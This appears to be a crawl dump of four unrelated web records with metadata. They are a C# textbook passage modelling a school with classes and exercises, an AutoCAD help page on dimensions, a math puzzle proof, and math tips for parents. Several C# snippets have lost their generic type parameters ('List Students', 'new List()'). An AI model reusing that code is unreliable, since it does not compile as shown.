public string FirstName { get; set; }     public string LastName { get; set; }       public Student(string firstName, string lastName)     {         this.FirstName = firstName;         this.LastName = lastName;     }       public string Name     {         get         {             return this.FirstName + \" \" + this.LastName;         }     }       public override string ToString()     {         return \"Student: \" + this.Name;     } }\n\nWe want to allow the class members to be editable so we define the FirstName and LastName as public read-write properties.\n\nTesting the Class Student\n\nBefore continuing forward we want to test the class Student to be sure it is correct. Let’s create a testing class with a Main() method and create a student in it and print the student:\n\n class TestSchool {     static void Main()     {         Student studentPeter = new Student(\"Peter\", \"Lee\");         Console.WriteLine(studentPeter);     } }\n\nWe run the testing program and we get a correct result:\n\n Student: Peter Lee\n\nNow we can continue with the implementation of the other classes.\n\nStep 2: Class Group\n\nThe next class we can define is Group. We choose it because the only one required for its definition is the class Student. The properties, which we will define, are the name of the group, a list of the students, which belong to the group, and a teacher who teaches the group. To implement the list with of the students we will use List<Student>. We will add a ToString() method to enable printing the group in a human-readable text form. Let’s see the implementation of the class Group:\n\n Group.cs using System.Collections.Generic;   public class Group {     public string Name { get; set; }     public List Students { get; set; }       public Group(string name)     {         this.Name = name;         this.Students = new List();     }       public override string ToString()     {         StringBuilder groupAsString = new StringBuilder();         groupAsString.AppendLine(\"Group name: \" + this.Name);         groupAsString.Append(\"Students in the group: \" +             this.Students);         return groupAsString.ToString();     } }\n\nIt is important when we create a group to assign an empty list of students to it. If we leave the list of students unassigned, it will be null and when we try to add a student, we will get an exception.\n\nTesting the Class Group\n\nLet’s now test the Group class. Let’s create a sample group, add few students to it and print the group at the console:\n\n static void Main() {     Student studentPeter = new Student(\"Peter\", \"Lee\");     Student studentMaria = new Student(\"Maria\", \"Steward\");     Group groupEnglish = new Group(\"English language course\");     groupEnglish.Students.Add(studentPeter);     groupEnglish.Students.Add(studentMaria);     Console.WriteLine(groupEnglish); }\n\nWe run the above testing code and we find a bug:\n\n Group name: English language course Students in the group: System.Collections.Generic.List`1[Student]\n\nIt seems like the list of students is printed incorrectly. It is easy to find why. The List<T> class does not correctly implement ToString() and we need to use another way to print a list of students. We can do this with a for-loop but let’s try something shorter and more elegant:\n\n using System.Linq; … groupAsString.Append(\"Students in the group: \" +     string.Join(\", \", this.Students.Select(s => s.Name)));\n\nThe above code uses an extension method and a lambda expression to select all students’ names as IEnumerable<string> and then combines them into a string using a comma as separator. Let’s test the Group class again after the fix:\n\n Group name: English language course Students in the group: Peter Lee, Maria Steward\n\nThe group class now works correctly.\n\nLet’s think a bit: who is teaching the students in the group? We should have a teacher, right. Let’s try to add the simplest possible class Teacher and define a property of it in the Group class:\n\n public class Teacher {     public string FirstName { get; set; }     public string LastName { get; set; }       public string Name     {         get         {             return this.FirstName + ' ' + this.LastName;         }     } }   public class Group {     public string Name { get; set; }     public List Students { get; set; }     public Teacher Teacher { get; set; }       public Group(string name)     {         this.Name = name;         this.Students = new List();     }       public override string ToString()     {         StringBuilder groupAsString = new StringBuilder();         groupAsString.AppendLine(\"Group name: \" + this.Name);         groupAsString.Append(\"Students in the group: \" +             string.Join(\", \", this.Students.Select(s => s.Name)));         groupAsString.Append(\"\\nGroup teacher: \" +             this.Teacher.Name);         return groupAsString.ToString();     } }\n\nLet’s test again with our sample groups of two students studying English:\n\n Student studentPeter = new Student(\"Peter\", \"Lee\"); Student studentMaria = new Student(\"Maria\", \"Steward\"); Group groupEnglish = new Group(\"English language course\"); groupEnglish.Students.Add(studentPeter); groupEnglish.Students.Add(studentMaria); Console.WriteLine(groupEnglish);\n\nWe find another bug:\n\n Unhandled Exception: System.NullReferenceException: Object reference not set to an instance of an object.    at Group.ToString() …\n\nWe step through the debugger and we see that we try to print the teacher’s name but there is no teacher (it is null). This is easy to fix. We could check whether the teacher exists prior to printing it in the ToString() method:\n\n if (this.Teacher != null) {     groupAsString.Append(\"\\nGroup teacher: \" +    this.Teacher.Name); }\n\nLet’s test again after the fix. Now we get the following correct result:\n\n Group name: English language course Students in the group: Peter Lee, Maria Steward\n\nLet’s now add a teacher to the testing group and check what happens:\n\n Student studentPeter = new Student(\"Peter\", \"Lee\"); Student studentMaria = new Student(\"Maria\", \"Steward\"); Group groupEnglish = new Group(\"English language course\"); groupEnglish.Students.Add(studentPeter); groupEnglish.Students.Add(studentMaria); Teacher teacherNatasha = new Teacher() {     FirstName = \"Natasha\", LastName = \"Walters\" }; groupEnglish.Teacher = teacherNatasha; Console.WriteLine(groupEnglish);\n\nThe result is correct:\n\n Group name: English language course Students in the group: Peter Lee, Maria Steward Group teacher: Natasha Walters\n\nNow the Group class works correctly. We can continue with the next class.\n\nStep 3: Class Teacher\n\nLet’s define the class Teacher. We already have some piece of it, but let’s define it in a better way. The teacher should have first name, last name and a list of group he teaches and should be printable in human-readable form. We can define it directly repeating the logic in the Group class:\n\n Teacher.cs public class Teacher {     public string FirstName { get; set; }     public string LastName { get; set; }     public List Groups { get; set; }       public Teacher(string firstName, string lastName)     {         this.FirstName = firstName;         this.LastName = lastName;         this.Groups = new List();     }       public string Name     {         get         {             return this.FirstName + \" \" + this.LastName;         }     }       public override string ToString()     {         StringBuilder teacherAsString = new StringBuilder();         teacherAsString.AppendLine(\"Teacher name: \" + this.Name);         teacherAsString.Append(\"Groups of this teacher: \" +             string.Join(\", \", this.Groups.Select(s => s.Name)));         return teacherAsString.ToString();     } }\n\nLike in the class Group, it is important to create and empty list of groups instead of leaving the Groups property uninitialized.\n\nTesting the Class Teacher\n\nBefore going further, let’s test the class Teacher. We can create a teacher with a few groups and print it at the console:\n\n static void Main() {     Teacher teacherNatasha = new Teacher(\"Natasha\", \"Walters\");     Group groupEnglish = new Group(\"English language\");     Group groupFrench= new Group(\"French language\");     teacherNatasha.Groups.Add(groupEnglish);     teacherNatasha.Groups.Add(groupFrench);     Console.WriteLine(teacherNatasha); }\n\nThe result is correct:\n\n Teacher name: Natasha Walters Groups of this teacher: English language, French language\n\nThis was expected. We just repeated the same logic like in the Group class which was already tested and all bugs in it was fixed. We found once again how important is to write the code step by step with testing and bug-fixing after each step, right? The bug with incorrectly printing the list of students would have been repeated when printing the list of groups, right?\n\nStep 4: Class School\n\nWe finish our object model with the definition of the class School, which uses all of the classes we already defined. It should have a name and should hold a list of students, a list of teachers and a list of groups:\n\n public class School {     public string Name { get; set; }     public List Teachers { get; set; }     public List Groups { get; set; }     public List Students { get; set; }       public School(string name)     {         this.Name = name;         this.Teachers = new List();         this.Groups = new List();         this.Students = new List();     } }\n\nBefore testing the class, let’s think what the class School is expected to do. It should hold the students, teachers and groups and should be printable at the console, right? If we print the school, what should be printed? Maybe we should print its name, all its students (with their inner details), all its teachers (with their inner details) and all its groups (with their inner details). Let’s try to define the ToString() method for the class School:\n\n public override string ToString() {     StringBuilder schoolAsString = new StringBuilder();     schoolAsString.AppendLine(\"School name: \" + this.Name);     schoolAsString.AppendLine(\"Teachers: \" +         string.Join(\", \", this.Teachers.Select(s => s.Name)));     schoolAsString.AppendLine(\"Students: \" +         string.Join(\", \", this.Students.Select(s => s.Name)));     schoolAsString.Append(\"Groups: \" +         string.Join(\", \", this.Groups.Select(s => s.Name)));     foreach (var teacher in this.Teachers)     {         schoolAsString.Append(\"\\n---\\n\");         schoolAsString.Append(teacher);     }     foreach (var group in this.Groups)     {         schoolAsString.Append(\"\\n---\\n\");         schoolAsString.Append(group);     }     foreach (var student in this.Students)     {         schoolAsString.Append(\"\\n---\\n\");         schoolAsString.Append(student);     }     return schoolAsString.ToString(); }\n\nWe shall not test the class School, because this will be the main purpose of our last class: SchoolTest.\n\nStep 5: Class SchoolTest\n\nThe final thing is the implementation of the class SchoolTest the purpose of which is to demonstrate all the classes we have defined (Student, Group, Teacher and School) and their methods and properties. This is our last subproblem. For the demonstration we create a sample school with a few students, a few teachers and a few groups and we print it:\n\nWe run the program and we get the expected result:\n\n School name: Saint George High School Teachers: Natasha Hudson, Steve Porter Students: Peter White, George Redwood, Maria Steward, Michael Robinson Groups: Advanced English, Java Programming course, HTML course --- Teacher name: Natasha Hudson Groups of this teacher: Advanced English, Java Programming course --- Teacher name: Steve Porter Groups of this teacher: HTML course --- Group name: Advanced English Students in the group: Michael Robinson, Maria Steward, George Redwood Group teacher: Natasha Hudson --- Group name: Java Programming course Students in the group: Maria Steward, Peter White Group teacher: Natasha Hudson --- Group name: HTML course Students in the group: Michael Robinson, Maria Steward Group teacher: Steve Porter --- Student: Peter White --- Student: George Redwood --- Student: Maria Steward --- Student: Michael Robinson\n\nOf course in real life programs do not start from the first time, but in this task the mistakes you could make are trivial so there’s no point in discussing them. All classes are implemented and tested. We are almost finished with this problem.\n\nTesting the Solution\n\nAs usually, it remains to test if the entire solution is working correctly. We’ve already done this. We tested all the classes in their nominal case.\n\nWe can do some tests with the border cases, for instance a group without students, empty school, etc. It seems like these cases work correctly. We might test a student without a name, but it is unclear whether the class should keep itself of incorrect names and what is a correct name. We can leave these classes without checks for the names. It will be a responsibility of their caller to put correct names though their constructors and properties. The problem description says nothing about this.\n\nIt is interesting how we delete a student. In our current implementation, if we delete a student, we will need to remove it from the school and to remove it from all groups he belongs to. The removal itself will require the student to have the Equals() method defined correctly or we should compare students by hand (property by property). It is unclear from the problem description how exactly the “delete student” operation should work.\n\nWe assume we don’t have time and we submit the solution in its current state without efficient delete operation. Sometimes it takes too much time to fix something and it is better to leave it in not perfect form. Below is the full source code of the solution of the school modeling problem:\n\nWe will not run performance tests because the task is not of a computational nature which requires a fast algorithm. Operations that could be slow are deleting of elements from a collection. Creating objects, assigning their properties and adding elements to their collections of child elements are all fast operations. Only the deletion could be slow. We could improve its performance by using HashSet<T> instead of List<T> in all aggregations. We leave this to the reader.\n\nLet’s make just one more note. Why we did not notice the performance problem with deleting elements earlier? Let’s recall how we proceeded with solving this problem. After thinking about the data structures we had to thing about the performance right? Did we do this step? We omitted this step and we found the problem too late. The conclusion is: follow the guidelines for problem solving. They are very wise.\n\n1.     Write a program, which prints a square spiral matrix beginning from the number 1 in the upper right corner and moving clockwise. Examples for N=3 and N=4:\n\n2.     Write a program, which counts the phrases in a text file. Any sequence of characters could be given as phrase for counting, even sequences containing separators. For instance in the text \"I am a student in Sofia\" the phrases \"s\", \"stu\", \"a\" and \"I am\" are found respectively 2, 1, 3 and 1 times.\n\n3.     Model with OOP the file system of a computer running Windows. We have devices, directories and files. The devices are for instance floppy disk, HDD, CD-ROM, etc. They have a name and a tree of directories and files. Each directory has a name, date of last change and list of files and directories, which it holds. Each file has a name, date of creation, date of last change and content. Each file is placed in one of the directories. Each file can be text or binary. Text files contain text (string), and the binary ones – sequence of bytes (byte[]). Create a class, which tests the other classes and demonstrates how we can build a model for devices, directories and files in the computer.\n\n4.     Using the classes from the previous task write a program which takes the real file system from your computer and loads it in your classes (just the names of the devices, directories and files, without the content of the files because you will run out of memory).\n\n1.     The task is analogical to the first task of the sample exam. You can modify the sample solution given above.\n\n2.     You may read the text char by char and after each char to append it to the current buffer buf and check each of the searched word for a match with EndsWith() in the buffer’s end. Of course you cannot use efficiently hash-table and you will have a loop for each letter from the text, which is not the fastest solution. This is a modification of the “char by char algorithm for word counting”.\n\nImplementing a faster solution needs to adapt the Aho-Corasick algorithm. Try to play with it and modify the code from the section “Counting Substrings with the Aho-Corasick Algorithm”.\n\n3.     The problem is analogical with the “School” problem from the sample exam and it can be solved by using the same approach. Define classes Device, Directory, File, ComputerStorage and ComputerStorageTest. Think of what properties each of these classes has and what are the relationships between the classes. Create a base abstract class File and inherit it from TextFile and BinaryFile. Test your code with sample hierarchy of devices, files and folders. Note: a file can be listed in more than one directory at the same time (unlike in the file system).\n\n4.     Use the class System.IO.Directory and its static methods GetFiles(), GetDirectories() and GetLogicalDrives(). Traverse the files system using the BFS or DFS graph traversal algorithm. Load partially the content of long files (e.g. the first 128 bytes / chars) to save memory.\n\n## Discussion Forum\n\nComment the book and the tasks in the : forum of the Software Academy.\n\n### One response to “Chapter 26. Sample Programming Exam – Topic #3”\n\n1. […] Chapter 26. Sample Programming Exam – Topic #3 […]\n\nThis site uses Akismet to reduce spam. Learn how your comment data is processed." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8636002,"math_prob":0.84510624,"size":77208,"snap":"2019-43-2019-47","text_gpt3_token_len":17267,"char_repetition_ratio":0.15337288,"word_repetition_ratio":0.22364166,"special_character_ratio":0.23577867,"punctuation_ratio":0.14565657,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9541921,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-20T01:45:22Z\",\"WARC-Record-ID\":\"<urn:uuid:542bd349-0804-4727-bd42-c1adcc007be6>\",\"Content-Length\":\"845571\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:069e7c33-d555-4fe8-be55-5dbc0e22db0e>\",\"WARC-Concurrent-To\":\"<urn:uuid:cc629954-5fbf-4687-86cc-bfe73533eb93>\",\"WARC-IP-Address\":\"164.138.217.83\",\"WARC-Target-URI\":\"https://introprogramming.info/english-intro-csharp-book/read-online/chapter-26-sample-programming-exam-topic-3/\",\"WARC-Payload-Digest\":\"sha1:3SXEHNDTDT4D5FKKI6NSTEFZQ267VAIY\",\"WARC-Block-Digest\":\"sha1:QK6ONHIP4EXIYF2GMCP3S3QFSMEKOYVJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670389.25_warc_CC-MAIN-20191120010059-20191120034059-00343.warc.gz\"}"}
https://entercad.ru/acad_aag.en/ws1a9193826455f5ff1a32d8d10ebc6b7ccc-6b59.htm
[ "You can draw dimensions in both paper space and model space. However, if the geometry you're dimensioning is in model space, it's better to draw dimensions in model space, because AutoCAD places the definition points in the space where the geometry is drawn.\n\nIf you draw a dimension in paper space that describes geometry in your model, the paper space dimension does not change when you use editing commands or change the magnification of the display in the model space viewport. The location of the paper space dimensions also stays the same when you change a view from paper space to model space.\n\nIf you're dimensioning in paper space and the global scale factor for linear dimensioning (the DIMLFAC system variable) is set at less than 0, the distance measured is multiplied by the absolute value of DIMLFAC. If you're dimensioning in model space, the value of 1.0 is used even if DIMLFAC is less than 0. AutoCAD computes a value for DIMLFAC if you change the variable at the Dim prompt and select the Viewport option. AutoCAD calculates the scaling of model space to paper space and assigns the negative of this value to DIMLFAC." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89463484,"math_prob":0.9870413,"size":1134,"snap":"2021-43-2021-49","text_gpt3_token_len":240,"char_repetition_ratio":0.1938053,"word_repetition_ratio":0.0,"special_character_ratio":0.19400352,"punctuation_ratio":0.070754714,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9910079,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-18T13:19:55Z\",\"WARC-Record-ID\":\"<urn:uuid:e642250d-d088-4411-8fa5-99f07c848e44>\",\"Content-Length\":\"11959\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:45b87946-87cd-493a-b158-9540d37b4b73>\",\"WARC-Concurrent-To\":\"<urn:uuid:c1952c5d-885b-480b-95e6-b92e0a43d136>\",\"WARC-IP-Address\":\"45.89.69.168\",\"WARC-Target-URI\":\"https://entercad.ru/acad_aag.en/ws1a9193826455f5ff1a32d8d10ebc6b7ccc-6b59.htm\",\"WARC-Payload-Digest\":\"sha1:WQIMU4MZKZKLSFG7Z4UNBN53W7LU6W66\",\"WARC-Block-Digest\":\"sha1:J4KAIG5B7VMB45ZBK4SUX3AJ5SII2THB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585203.61_warc_CC-MAIN-20211018124412-20211018154412-00380.warc.gz\"}"}
https://davidwees.com/content/do-these-glasses-end-same-amount-each-type-soda/
[ "Education ∪ Math ∪ Technology\n\nFirst watch this short video created by Dan Meyer so you understand the problem.\n\nI was having trouble wrapping my head around this problem. I saw people’s algebraic proofs, and I just felt there was something wrong with them. So I decided to construct a geomtric proof instead to make it more clear in my head.", null, "At step 1, both glasses have the same amount of liquid. At step 2, one glass has some liquid poured into the other glass. At step 3, we pour out the same amount of liquid from the right most glass, hence the area of the red rectangle is equal to the area of the vertical rectangle with the mixture of the two types of soda. Note that I’ve made sure to go the other direction in the diagram, so as to represent the fact that assuming the two liquids are mixed equally, essentially the soda I pour back is a mixture. In step 4, I note that area A + B is the same as B + C, because the two liquids are the same, and that the area of B is the same in both pictures, and so hence the area of A is the same as the area of C, which means that the amount of the first soda moved back and forth is the same." ]
[ null, "https://davidwees.com/sites/default/files/Geometric%20proof_0.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94909036,"math_prob":0.9384182,"size":1707,"snap":"2021-43-2021-49","text_gpt3_token_len":419,"char_repetition_ratio":0.13388139,"word_repetition_ratio":0.0,"special_character_ratio":0.24194494,"punctuation_ratio":0.103174604,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97509587,"pos_list":[0,1,2],"im_url_duplicate_count":[null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-03T13:46:08Z\",\"WARC-Record-ID\":\"<urn:uuid:9191c4e8-e6ef-4932-801d-dc4d34bf3ec3>\",\"Content-Length\":\"56732\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7dc8f157-f0b2-4fe4-ad2c-1356218d6541>\",\"WARC-Concurrent-To\":\"<urn:uuid:89d0d75d-9e7f-422b-ba25-3319fe656cb5>\",\"WARC-IP-Address\":\"173.236.245.26\",\"WARC-Target-URI\":\"https://davidwees.com/content/do-these-glasses-end-same-amount-each-type-soda/\",\"WARC-Payload-Digest\":\"sha1:JDED4KSFTQGFZ6324SZ7WLJKNXIPKUOU\",\"WARC-Block-Digest\":\"sha1:LP27AT7B5FVNOJR67G5OY6TRN6PHUY3K\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964362879.45_warc_CC-MAIN-20211203121459-20211203151459-00594.warc.gz\"}"}
https://educatingnow.com/parents/
[ "# » Parents\n\n### Play games such as:\n\n1. Any board game that uses dice and cards\n2. Dot card and 10 frame games and activities\n3. Set\n4. Tangos\n5. ‘Make 10 Go Fish’\n6. Mastermind\n7. Dominoes\n8. Mancala\n9. Chess/Checkers\n10. Cribbage\n11. Yahtzee\n1. Cribbage\n2. Yahtzee\n3. Set\n4. Tangos\n5. Mastermind\n6. Dominoes\n7. Mancala\n8. Chess/Checkers\n9. For younger students: anything with Dice and cards (Snakes and Ladders, board games, card games –‘ Make 10 Go Fish’)\n\n### Strike It Out\n\nPower of 10 (partitioning): knowing the pairs of numbers that add to make 10 to partition numbers. Examples: 7+4 = 7+3+1 = 10+1= 11 or 8+5 = 8+2+3=10+3=13\n\nNear Doubles: once students know their doubles this can be used to find near doubles. Examples: 7+8 = 7+7+1 = 14+1 = 15 or 6+7 = 6+6+1=12+1=13\n\nAdding 9: we want students to see that adding 9 is the same as adding 10, subtract 1. Example: 9+6 = 10+6-1 = 16-1 = 15 or 9+8 = 10+8-1=18-1=17\n\nPartitioning into place value: this also reinforces the universal “rule” to adding any numbers (whole numbers, decimals, fractions, variables) that you add “like terms”. Example: 324+68 à 300 + (20+60) + (4+8) = 300+80+12 = 392\n\n## Subtraction Strategies\n\nSubtract 9: is just like subtracting 10 +1. Connect this to adding 9. Example: 13-9 = 13-10+1 = 3+1 = 4\n\nSubtract 8: subtract 10 +2. Example: 12-8 = 12-10+2 = 2+2 = 4\n\nPower of 10 or partitioning: break up the numbers to make it a multiple of 10. Example: 13-5 = 13-3-2 = 10-2=8.\n\nThink of it as addition and count up. Example: 14-6 = 6 + ? = 14 àthen they could do 6 + 4=10 + 4 =14 so ? = 8. This strategy can be very useful for larger number subtractions.\n\n## Multiplication Strategies\n\nFor meaning: use arrays, area models, manipulatives and “GROUPS OF” (if they can’t give you a story problem that would use multiplication it means they likely don’t have conceptual understanding)\n\nMost students find the 0,1,2,5,10 multiplication facts easier to learn, and so use strategies based on what they know. Using strategies builds number sense and are good pre-algebra thinking activities for students.\n\n3’s: double a number and add another group (if they have become proficient at adding, this will be easier for them). Example: 3 x 7 = 2 x 7 +7= 14 + 7 = 21\n\n4’s: double twice. Example: 4 x 8 = 2 x 8 x 2 = 16 x 2 = 32\n\n6’s: double the 3’s. Example: 6 x 6 = 3 x 6 x 2= 18 x 2 = 36\n\nOR  do the # x5 + another group of the #.  Example: 6 x 6 = 5 x 6 = 30 + 6 = 36\n\n7’s:  do the #x5 + the # x2. Example: 7 x 8 = 5 x 8 + 2 x 8 = 40+16 = 56\n\n8’s: double three times. Example: 8 x 8 = 8 x 2 x 2 x 2= 16 x 2 x 2 = 32 x 2 = 64\n\nOR double the 4’s if they know them. Example:  8 x 6 = 4 x 6 x 2 = 24 x 2 = 48\n\nOR “jump off” what they know by adding or subtracting groups. Example: 8 x 7 (if the student\n\nknew 7 x7 = 49, then they can add another group of 7 = 56)\n\n9’s: multiply by 10 and then subtract one group of the number. Example: 9 x 7 = 70-7 = 63\n\nOR use the knowledge that the digits will always add to 9, the pattern of tens and ones\n\n11’s: Pattern found up to 9 x 11. Example: 11 x 4 = 44\n\nOR Multiply by 10 and add another group. Example:  11 x 7 = 10 x 7 + 7 = 70+7=77\n\n12’s: do 10 x the # +2 x the number. Example: 12 x 7 = 10 x 7 + 2 x 7 = 70+14=84\n\nOR add another group to 11’s. Example: 12 x 8 = 11 x8 + 8 = 88+8 = 96\n\n## Multi-Digit Multiplication Strategies\n\nUse box method or Area Model, distributive property, traditional with meaning (multiplying numbers not digits, so no “carrying over”).  All of these methods will have future applications like multiplying binomials. Examples:\n\n## Division strategies\n\nMost students find it easiest to think about as the opposite of multiplication.\n\nFor meaning: use arrays, area models, manipulatives and explore both equal sharing and equal grouping and how they are similar and different.\n\nEqual Sharing: 12÷4 = 3 means 12 divided into 4 equal groups = 3 in each group:\n\nMulti-Digit Division:\n\nRepeated subtraction or Partial Quotient method for multi-digit division can be a welcome strategy to use rather than the traditional long division algorithm:\n\nLong division algorithm with meaning: 2 Options:", null, "In today’s post we will be exploring how to connect reading to math, math in the home, and math out ...", null, "Most adults use estimation and calculators to do their daily math, rarely do they get out a piece of paper ...", null, "I saved the best for last! Who doesn’t love playing games?! This last post for parents on how to support ...\n\n## Tips for supporting your child at home:\n\nAvoid endorsing math anxiety or being “bad at math”. Students who have these attitudes towards math have more difficulties learning math than those who approach it positively. This is the “growth mindset” versus “fixed mindset” and has been proven to really affect learning. Another way to encourage a Growth Mindset is to encourage perseverance through frustration and understanding that mistakes actually make the brain grow – so are not bad but rather are very useful for developing understanding.\n\nMath is literally all around us….if we look for it. It doesn’t have to be just computations but rather looking at relationships, patterns and sizes. Problem solving, deciding between choices are also mathematical processes, as are playing games and solving logic puzzles.\n\nFor younger students: grouping and organizing toys, practicing adding and subtracting using toys, blocks, etc. and looking for and making patterns. Comparing more than and less than and by how much. For example: a child has 4 dolls and 12 stuffed animals, you could ask, “how many more stuffed animals than dolls do you have and how do you know?”\n\nRead books that involve math or find the math in nighttime stories. Encourage creativity and ask your child to find the math (shapes, counting, comparing, categorizing, estimating, etc.) in stories, shows, movies etc. This helps develop mathematical habits of mind.\n\nWe know you want to support your children as best as you can. That can be tough in an age where there is almost too much information and conflicting information! This is particularly true with our new math curriculum.\n\nThis page is here to help provide you with some information about our math curriculum. It also provides you with some activities you can do at home, and links to other great websites that can help you support your child best. Math can be fun, easy and challenging – but in a good way. It is all about how we approach it.\n\n## Minimize Math Anxiety\n\nFor many of us math was no fun in school. It was difficult and often a complete mystery. It is easy to think that math is ‘hard’ because of our experiences with it. But for many of us, that is because of how it was taught. Our new methods overcome that. Avoid endorsing math anxiety or being “bad at math”. Students who have these attitudes towards math have more difficulties learning math than those who approach it positively.\n\n## Encourage a Growth Mindset\n\nWe all have either a “growth mindset” or “fixed mindset” when it comes to math. These mindsets have been proven to really affect learning.To develop a Growth Mindset encourage your child to persevere through frustration and understand that mistakes are a really important part of the learning process – so are not bad but rather are very useful when we reflect on them and understand what type of mistake it was (carless mistake, misunderstanding, etc.). Also we need to remember that learning is challenging and when things get difficult that doesn’t mean there is anything wrong but rather it is a part of learning! New concepts are often difficult at first, while we are trying to connect them to what we already know and make sense of them, and then with time and practice, they are not so difficult anymore. Embrace the struggle – without great struggle there is no great learning!\n\n## Helping with Homework:\n\nMany parents don’t understand why we use multiple strategies to solve the problem when only one strategy is needed. We are teaching students WHY the math works when we use different strategies so even though you may think that the strategies are inefficient there is a very important purpose to using them. Some strategies are inefficient but are an important stepping stone towards deeper understanding. Imagine an Olympic diver attempting a complex dive off of a high board without first practicing multiple small steps in a foam pit or supported trampoline. It is the same learning approach.\n\nWe use manipulatives (blocks, tiles, fraction circles) and pictures to help students make sense of what the math actually means. For example 4 x 3 means 4 groups of 3, or 4 rows of 3. Most humans gather 70%-90% of their information visually, so we are making math more visual to help more people understand it. We also use these visuals to help us find the generalizations in math that become those ‘rules’ you might have memorized. This way students actually understand why the rules work as they do and they often construct the rules themselves which means they are way more likely to remember them!\n\nIt is great role modeling for your children to see you as a lifelong learner who is open minded to trying new things. We encourage you to try to understand these different methods and visuals as this can help improve your number sense too!\n\nIf you are really stuck and can’t help your child with their homework, please send along a note to the teacher explaining so. This is more helpful than teaching them a shortcut or the traditional algorithm before they have enough deeper understanding to actually understand the algorithm or short cut. If they can’t explain why something works, then they don’t have the understanding we’re aiming for.\n\n## Involve your child in “real-life” math (adjust for the child’s age)\n\n### Grocery shopping:\n\n1. Practice rounding items to the nearest dollar or dime (example: if a jar of peanut butter is \\$4.69 – is this closer to \\$4 or \\$5? How do you know?)\n2. Estimate the value of each item and create a total estimate. This can be a game to see how close you come to the real value.\n3. Compare prices to see which is the better deal. This can be done using estimation or using the unit prices listed on most prices.\n4. If you buy enough groceries to last 4 or 5 days, estimate the cost per day\n5. Determine how much you save if you buy things on sale.\n\n### Cooking/Baking:\n\n1. Just using measuring spoons and cups and reading recipes helps!\n2. When doubling or halving recipes, determine how much of each ingredient is needed.\n3. Looking at the measurements on measuring spoons and cups, determine how many teaspoons in a tablespoon, how many tablespoons in a ¼ cup, etc.\n4. Ask them to do the measuring and show when you estimate (1/2 teaspoon in your palm etc).\n\n### In the kitchen:\n\n1. What holds more – juice container or milk container? How do you know? How much more?\n2. Find containers that have similar volumes but different shapes (like a tall skinny container compared to a short fat container). Ask them to determine by looking which has more, then read the volumes\n3. Estimate weights of ingredients (a potato, carrots, etc) and then weigh them on a scale to see how close you came.\n4. Chop vegetables into fractions! If I chop a celery stalk into 4 pieces, what fraction of the stalk is each piece?\n\n### In the car: (keep in mind that the working memory is not fully developed so don’t surpass 2-digit numbers unless your child can work with larger numbers mentally)\n\n1. Make 20 – they can make 20 by adding, subtracting, multiplying, dividing, or a combination. This can be done with any number and the more ways a child can find the better! For K – make 5, for Gr. 1/2 – make 10, for Gr. 3/4 – Make 20, 25, 30,etc. for Gr. 5- up to make 100\n2. Estimate how far 1 km is (use your odometer). Estimate 2 km. Use Siri to get directions and then make a game out of when to turn (she’ll say “turn left in 500m”). It helps students to know how far 500 m or 200 m is.\n3. Ask your child an addition (subtraction, multiplication, division) question and then ask them HOW they got it. For example: 15 + 7 (they might say 10 +5+7 = 10+12 =22).\n4. Ask your child to create a story problem or real-life problem to match a question. For example: 3 x 4 à A story problem that might work. I have 3 friends over and I give each friend 4 candies from my Halloween stash, how many candies did I give away?\n5. Give a question and ask your child to estimate only and then see who is closest (you can play too). For example: 43 x 37 (estimate 40 x 40 = 1600)." ]
[ null, "https://educatingnow.com/wp-content/uploads/2020/02/kids-300x149.png", null, "https://educatingnow.com/wp-content/uploads/2018/04/Parents-How-to-Help-Your-Children-to-Learn-Enjoy-Math-Part-10.png", null, "https://educatingnow.com/wp-content/uploads/2018/06/fraction-war-300x216.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93505603,"math_prob":0.9571624,"size":8996,"snap":"2022-27-2022-33","text_gpt3_token_len":2277,"char_repetition_ratio":0.1116548,"word_repetition_ratio":0.07542579,"special_character_ratio":0.26789683,"punctuation_ratio":0.10086768,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98635876,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-18T16:24:59Z\",\"WARC-Record-ID\":\"<urn:uuid:e0066002-d0ee-4a02-a45b-de04934830da>\",\"Content-Length\":\"136107\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:58910c5a-4162-4c6d-87e0-857916176b11>\",\"WARC-Concurrent-To\":\"<urn:uuid:e6bd1a1a-3b65-4e48-8b53-ffe99cec9ac7>\",\"WARC-IP-Address\":\"172.67.184.34\",\"WARC-Target-URI\":\"https://educatingnow.com/parents/\",\"WARC-Payload-Digest\":\"sha1:5JTFDGE6F2ATBOEL2JL6CSTGJH373QZH\",\"WARC-Block-Digest\":\"sha1:EZRFNDFEIDI6L72KXKNW33SL2A7JOXFZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882573242.55_warc_CC-MAIN-20220818154820-20220818184820-00190.warc.gz\"}"}
